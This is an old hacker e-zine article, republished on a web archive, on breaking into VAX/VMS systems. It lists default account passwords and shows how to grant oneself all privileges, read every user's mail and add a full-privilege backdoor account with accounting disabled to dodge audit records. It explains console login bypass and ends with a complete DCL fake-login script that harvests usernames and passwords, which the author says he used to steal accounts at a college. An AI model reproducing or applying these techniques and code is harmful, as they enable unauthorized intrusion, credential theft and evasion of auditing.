Copy Link
Add to Bookmark
Report

Hacking VAX/VMS + The User Authorisation File

eZine's profile picture
Published in 
Elektrix
 · 1 year ago

INTRODUCTION

The VAX is made by DEC (Digital Equipment Corp) and can run a variety of operating systems. In this file i will talk about the VMS (Virtual Memory Operating System), VMS also runs on the PDP-11, both mainframes are 32 bit machines with 32 bit virtual address space.

ENTRANCE:

When you first connect to a VAX you type either a return, a ctrl-c or a ctrl-y. It will then respond with something similar to this:

USERNAME: 
PASSWORD:

The most frequent way of gaining access to a computer is by using a 'default' password, this by the way is not very successful....... When DEC sells a VAX/VMS, the system comes equipped with 4 accounts which are:

  • DEFAULT: This serves as a template in creating user records in the UAF (User Authorization File). A new user record is assigned the values of the default record except where the system manager changes those values. The default record can be modified but can not be deleted from the UAF.....
  • SYSTEM: Provides a means for the system manager to log in with full privileges. The SYSTEM record can be modified but cannot be deleted from the UAF ...
  • FIELD: Permits DIGITAL field service personnel to check out a new system. The FIELD record can be deleted once the system is installed.
  • SYSTEST: Provides an appropriate environment for running the User Environment Test Package (UETP). The SYSTEST record can be deleted once the system is installed.

Usually the SYSTEM MANAGER adds, deletes, and modifies these records which are in the UAF when the system arrives, thus eliminating the default passwords, but this is not always the case..... some default passwords which have been used to get in a system are....

 USERNAME                   PASSWORD 

SYSTEM MANAGER or OPERATOR
FIELD SERVICE or TEST
DEFAULT USER or DEFAULT
SYSTEST UETP or SYSTEST

Other typical VMS accounts are :

  • VAX
  • VMS
  • DCL
  • DEMO
  • GUEST
  • GENERAL
  • TEST
  • HELP
  • GAMES
  • DECNET

Or a combination of the various usernames and passwords. If none of these get you in, then you should try another system unless you have away of getting an account either by trashing or other means.....

YOUR IN!!!!!!

You will know that you are in by receiving the prompt of a dollar sign ($). You will be popped into the default directory which is dependent on what account you logged in as. If you get in as system manager (highly unlikely) you have full access....

If you get the FIELD or SYSTEST account, you may or may not have full access, but you may have the privileges to give your self full access.

To give privs to yourself:

$ SET PROCESS/PRIVS=ALL

The VMS system has full help files available by typing HELP. You can use the wildcard character of an '*' to list out info on every command:

$ help *

When you first logon, it may be to your advantage to get a list of all users currently logged onto the system if there are any at all. You can do this by:

$ SHOW USERS 

VAX/VMS Interactive Users-Total=4
01-may-1989 11:37:21.73
0PAO: DEMO 004C004C
TTD2: FIELD 004E02FF
TTD1: SYSMAN 0043552E
TXB3 TRTRTRRTR 01190057

It is highly recommended that if you are logged on in the day and there are people logged in, especially the system manager or the account you are logged on as appears twice.. log out straight away, and call back later. You do not want to call to late though as the system keeps a record of when each user logs in and out.

To communicate with other users or other hackers that are on the system, use the PHONE utility..

$ PHONE Username

If the system has DEC-NET you can see what available nodes there are by:

$ SHOW NETWORK

If you have mail the system will tell you as soon as you logon, simply type:

$ MAIL

This will invoke the Personal Mail Utility, you can then either read your mail or select help....

DIRECTORIES:
To see what you have in your directory type:

$ DIR

To get a list of directories on the system type:

$ DIR *.*

When a VAX/VMS is first installed, it comes with 9 directories which are not listed when you execute the DIR *.* command:

<SYSLIB>

This directory contains various macro and object libraries.

<SYSMSG>

This directory contains files used in managing the operating system.

<SYSMGR>

This directory contains text files and help libraries for the HELP library.

<SYSERR>

This is the directory for the error log file (ERRLOG.SYS).

<SYSTEST>

This directory contains files used in testing the functions of the operating system.

<SYSMAINT>

This directory contains system diagnostic programs.

<SYSUPD>

This directory contains files used in applying system updates.

<SYSUPD.EXAMPLES>

This directory contains sample driver programs, user-written system services, and other source programs.

<SYSEXE>

This directory contains the executable images of most of the functions of the operating system.

Inside these directories are files with the following file types:

File-Type:        Description:                        command: 
--------------------------------------------------------------------
.hlp system help file TYPE filename
.dat data file TYPE filename
.msg message file TYPE filename
.doc Documentation TYPE filename
.log LOG file TYPE filename
.err ERROR msg file TYPE filename
.seq sequential file TYPE filename
.sys system file FILE-NAME
.exe executable file FILE-NAME
.com command file COMMAND NAME
.bas basic file RUN file-name
.txt ascii text file TYPE filename
--------------------------------------------------------------------

There are others but you won't see them as much as the above. You can change the directories either by using the CHANGE command or by using the SET DEFAULT command:

$ CHANGE <DIR.NAM>

or

$ SET DEFAULT <DIR.NAM>

You can now list and execute the files in this directory without first the directory name followed by the filename as long as you have sufficient access. If you don't have sufficient access you can still view files within directories that you cannot default to by:

$ TYPE <LOD.DIR> LOD.MAI;1

This will list the contents of the file LOD.MAI;1 in the directory of <LOD.DIR>

The use of wildcards is very helpful when you desire to view all the mail or something on the system. To list out all the users mail if you have access type:

$TYPE <*.*>*.MAI;*

As you may have noticed mail files have the extension of MAI at the end. The ;1 or ;2 etc are used to number files with the same name.

PRIVILEGES

Privileges fall into 7 categories according to the damage that the user possessing them could cause to the system:

  • NONE - No privileges
  • NORMAL - minimum privileges to use the system.
  • GROUP - Potential to interfere with members of the same group.
  • DEVOUR - Potential to devour noncritical system-wide resources.
  • SYSTEM - Potential to interfere with normal system operation.
  • FILE - Potential to compromise file security.
  • ALL - Potential to control the system (wouldn't that be good ahah).

THE UAF

The User Authorization File contains the names of the users who may log into the system and also contains a record of the users privileges. Each record in the UAF includes the following:

  1. Name and Password.
  2. User Identification Code(UIC)-- Identifies a user by a group number and a member number.
  3. Default file specification --- Has the default device and directory names for file access.
  4. Login command file --- Names a command procedure to be executed automatically at login time.
  5. Login flags --- Allows the system manager to inhibit the user of the ctrl-y functions and lock user passwords.
  6. Priority ---- Specifies the base priority of the process created by the user at login time.
  7. Resources --- Limits the system resources the user may perform.
  8. Privileges --- Limits the activities the user may perform.

If you have SYSTEM MANAGER privileges, you will be able to add, delete, and modify records in the UAF.

The AUTHORIZE Utility allows you to modify the information in the UAF.
It is usually found in the SYSEXE directory.

The commands for AUTHORIZE are:

  • ADD Username <qualifier..> Adds a record to the UAF.
  • EXIT (or CTRL-Z) Returns you to command level.
  • HELP Lists the AUTHORIZE commands.
  • LIST <Userspec></FULL> Creates a listing file of UAF records.
  • MODIFY Username Modifies a record.
  • REMOVE Username deletes a record.
  • SHOW Displays UAF records.

The most useful besides ADD is the SHOW command. SHOW displays reports for selected UAF records. YOU can get a /BRIEF listing of a /FULL listing. BUT before you do that, you may want to make sure no one is logged on besides you, to make sure know one can log on type the following:

$ SET LOGINS /INTERACTIVE=0

This establishes the max number of users able to log in to the system, this command does not affect users currently logged on.

To list out the user file do the following:

$ SET  DEFAULT <SYSEXE> 
$ RUN AUTHORIZE
UAF> SHOW * /BRIEF

UAF
Unfortunately you cannot get a listing of passwords, though you can get a listing of all the users as shown above... The passwords are encrypted just like the unix systems.

If you have sufficient privs you can create your own account.........

UAF> ADD <Username> /PASSWORD=HACKER /UIC=<014,006> /CPUTIME=0  /DEVICE=SYS$ROOT_/ACCOUNT=VMS /DIRECTORY=<SYSERR> /PRIVS=ALL  /OWNER=DIGITAL /NOACCOUNTING

  1. ADD USERNAME
  2. SPECIFY THE PASSWORD YOU WANT TO USE....
  3. ASSIGN A UIC CONSISTS OF 2 NUMBERS FROM 0 TO 377 SEPERATED BY A COMMAND ENCLOSED IN BRACKETS....
  4. CPUTIME IS IN DELTA FORMAT, 0 MEANS INFINITE......
  5. SPECIFY THE DEVICE THAT IS ALLOCATED TO THE USER WHEN THEY LOGIN. OTHER DEVICES ARE SYS$DEVICE,SYS$SYSDISK ETC..
  6. SPECIFYING AN ACCOUNT IS NOT REALLY NECCESSARY
  7. PRIVS YOU ARE GOING TO WANT ALL THE PRIVS AREN'T YOU???
  8. VERY IMPORTANT.... NOACCOUNTING WILL DISABLE THE SYSTEM ACCOUNTING RECORDS,THUS NOT ADDING INFORMATION TO THE ACCOUNTING.DAT FILE.

LOGGING OFF
Simply type:

    $ LOGOUT

BYPASSING THE UAF...

The preferred method of breaking into a locked system is to set the alternat UAF. This method requires setting the system parameter UAFALTERNATE, which defines the logical name SYSUAF to refer to the file SYS$SYSTEM:SYSUAFALT.DA If this file is found during a normal login, the system uses it to validate the account and prompts you for the username and password. If this file is not located, the system assumes that the UAF is corrupt and accepts any username and password to log you into the system from the system console. Logins are prohibited from all other locations.

NOTE: You can only use this method to log into the system from the console terminal; you cannot use the other terminal lines.

To set the alternate UAF, use the following procedure:

1: Perform a conversational boot..
2: When the SYSBOOT > prompt appears, enter the following

       SYSBOOT > SET UAFALTERNATE 1 <cr>

3: Type CONTINUE and press <cr>
4: When the start up procedure completes, log in on the console terminal by entering any username and password when asked to..

The system assigns the following values to your user account:

  NAME.................. Username. 
UIC................... [001,004].
COMMAND INTERPRETER... DCL.
LOGIN FLAGS........... None.
PRIORITY.............. Value of system parameter (DEFPRI).
RESOURCES............. Value of the PQL system parameters.
PRIVILEGES............ ALL.

The process name is usually the name of the device on which you logged in EG opa0..

5: Fix the problem that caused you to be locked out of the system. That is, make the necessary repairs to the UAF or to the start up or login procedures . (If you modify a login or startup procedure and the problem is still not solved, restore procedure to its previous state.

If the problem is a forgotten password, reset the UAFALTERNATE system param to 0, as explained in the next step. Then enter the authorize utility and then type HELP MODIFY for info on modifying passwords...

6: Clear the UAFALTERNATE parameter by running SYSGEN and using SYSGEN commands. To run SYSGEN, enter the following commands at the DCL prompt:

     $ RUN SYS$SYSTEM:SYSGEN <CR>

The SYSGEN prompt is then displayed, then enter the following commands:

     SYSGEN > SET UAFALTERNATE 0 <CR> 
SYSGEN > WRITE CURRENT <CR>
SYSGEN > EXIT <CR>

7: Shutdown and reboot the system.

Emergency startup after modifying system parameters.

In some cases, modifying system parameters may cause the system to become unbootable. If this occurs, use the following emergency startup procedure to restore normal operation.....

1: Perform a conversational boot....
2: When the SYSBOOT > prompt appears enter the following commands:

     SYSBOOT > USE DEFAULT.PAR <CR> 
SYSBOOT > CONTINUE <CR>

3: When the system finishes booting, review any changes you made to SYSGEN parameters, modify MODPARAMS.DAT as necessary and re execute AUTOGEN.

BYPASSING STARTUP AND LOGIN

If the system does not complete the startup procedures or does not allow you to log in , bypass the startup and login procedures by following these steps

1: Perform a conversational boot..
2: define the console to be the startup procedure by entering the following commands at the SYSBOOT > prompt:

     SYSBOOT > SET/STARTUP OPA0:

Type continue and press <CR> in response to the next SYSBOOT > prompt.
Wait for the DCL prompt to return.....

3: Correct the error condition that caused the login failure. That is, make the necessary repairs to the startup or login procedures, or to the UAF. You may want to enter the following DCL commands because bypassing the startup procedures leaves the system in a partially initialized state:

     $ SET NOON <CR> 
$ SET DEFAULT SYS$SYSROOT:[SYSEXE] <CR>

Invoke a text editor to correct the startup or login procedure file. Note that some system consoles may not supply a screen mode editor.

4: Reset the startup procedure by invoking SYSGEN and entering the following commands:

     $ RUN SYS$SYSTEM:SYSGEN <CR> 
SYSGEN > SET/STARTUP SYS$SYSTEM:STARTUP.COM <CR>
SYSGEN > WRITE CURRENT <CR>
SYSGEN > EXIT <CR>

5: Perform a normal startup by entering the following command:

     $ @SYS$SYSTEM:STARTUP <CR>

To perform an orderly shutdown of the system, invoke SHUTDOWN.COM from any terminal and any privileged account with the following DCL command:

     $ @SYS$SYSTEM:SHUTDOWN <CR>

EMERGENCY SHUTDOWN WITH OPCRASH

This describes how to halt the system immediately without performing any of the functions that ensure an orderly shutdown. You use the OPCRASH procedure only if SHUTDOWN.COM FAILS......

To perform this procedure you must have CMKRNL privilege. You can enter the commands from ANY terminal.

1: Enter the following command to force an immediate shutdown of the system

      $ RUN SYS$SYSTEM:OPCRASH <CR>

2: At the system console the following message is displayed SYSTEM SHUTDOWN COMPLETE - USE COBSOLE TO HALT SYSTEM.

3: Halt the system
e.g. emergency shutdown using opcrash...

      $ RUN SYS$SYSTEM:OPCRASH <CR>

GENERAL MAINTENANCE OF THE UAF

To disable an account use the following command:

   UAF > MODIFY  USERNAME/FLAGS=DISUSER <CR>

The login flag disuser disables the account and prevents anyone from logging into the account.

To enable the account when it is needed, run AUTHORIZE and specify the following command:

   UAF > MODIFY USERNAME/FLAGS=NODISUSER <CR>

MODIFYING A USER ACCOUNT

Use the AUTHORIZE command MODIFY to change any of the fields in an existing user account. The following command is used to change a users password.

   UAF> MODIFY USERNAME/PASSWORD=NEWPASSWORD <CR>

LISTING USER ACCOUNTS

Use the AUTHORIZE command LIST to create the file SYSUAF.LIS containing a summary of all user records in the UAF, as follows:

   UAF > LIST <CR> 

%UAF-I-LSTMSG1, WRITING LISTING FILE
%UAF-I-LSTMSG2, LISTING FILE SYSUAF.LIS COMPLETE.

By default the LIST command produces a brief report containing the following info from the UAF:

ACCOUNT OWNER, USERNAME, UIC, ACCOUNTNAMES, PRIVILEGES, PROCESS PRIORITY, DEFAULT DISK AND DIRECTORY.

Use the /FULL qualifier to create a full report of all the info contained within the UAF.....

ENABLING SECURITY ALARMS

To enable security auditing, specify the dcl command SET AUDIT in the following format:

   $ SET AUDIT/ALARM/ENABLE = KEYWORD [...]

Select the events to be audited by specifying one or more of the keywords to the /ENABLE qualifier....

  • ACL.......... Event requested by an acl on a file or global section..
  • ALL.......... All possible events..
  • AUDIT........ Execution of the SET AUDIT command..
  • AUTHORIZATION modifications to the system UAF file, network proxy, authorization file, rights database, or changes to system and user passwords..
  • BREAKIN...... Successful breakin attempt..
  • FILE ACCESS.. Selected types of access (privileged + non privileged) to files + global sections..
  • INSTALL...... Installation of images..
  • LOG FAILURE.. Failed login attempt..
  • LOGIN........ Successful login attempt..
  • MOUNT........ Volume mounts + dismounts..

ENABLING ALARM MESSAGES

After you enable a security operator terminal, enable specific alarm events with the SET AUDIT/ENABLE qualifier. Alarm messages are then sent to the security operator terminal when the selected events occur.

AUDIT REDUCTION FACILITY

If you have enabled security alarms, the operating system writes the information about these alarms to the security operators log file. To extract all of the security alarm info from the current operators log file (SYS$MANAGER:OPERATOR.LOG) execute this command:

   $ @SYS$MANAGER:SECAUDIT <CR>

Output from SECAUDIT is displayed on SYS$OUTPUT. If you want to write the records to a file, include the file spec with the /OUTPUT qualifier.. The following command writes the records to the file BREAKINS.DAT in the user current directory..

   $ @SYS$MANAGER:SECAUDIT/OUTPUT=BREAKINS.DAT

SIMPLE DECOY PROGRAM

This is a decoy program that runs on the vax/vms system.. It does work because i have used it at the local college of FE, to steal passwords and accounts whilst working there....

The program now follows:

 $ clear 
$ set term/noecho/notype
$ SYSNAM:=(nodename)
$begin:
$ read/error=begin/prompt="" sys$command ret
$ write sys$output ""
$ID:
$ wait 00:00:00.5
$ write sys$output "*** ''SYSNAM' VAX/VMS SYSTEM ***"
$ write sys$output ""
$ write sys$output ""
$ wait 00:00:01
$ set term/echo
$ askquest:
$ read/error=fail/end=eof/prompt="USERNAME: "/time=20 sys$command quest
$ if f$edit(quest,"upcase") .eqs. "SYBIL" then SYSNAM:=SYBIL
$ if f$edit(quest,"upcase") .eqs. "SYBIL" then goto ID
$ if quest .nes. "" then goto askpass
$eof:
$ write sys$output "Error reading command input"
$ write sys$output "End of file detected"
$ goto begin
$fail:
$ write sys$output "Error reading command input"
$ write sys$output "Timeout period expired"
$ goto begin
$askpass:
$ set term/noecho
$ read/error=eof/end=eof/prompt="PASSWORD: " sys$command pass
$ set term/echo
$ open/write file data.dat
$ write file quest
$ write file pass
$ write file f$time()
$ close file
$ set term/lowercase
$ write sys$output "User authorization failure"
$ read/error=begin/prompt ="" sys$command ret
$ stop/id='f$getjpi("","PID")

Notes about use...

  1. ... change the welcoming message of the program to what is actually seen on your vax...
  2. ... why not put at the top of the program the logout procedure of someone else.. because a blank screen looks a bit suspicious... just copy the log out statement and put it between a sys$output command in the program .. not forgetiing to take the clear command out haha

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT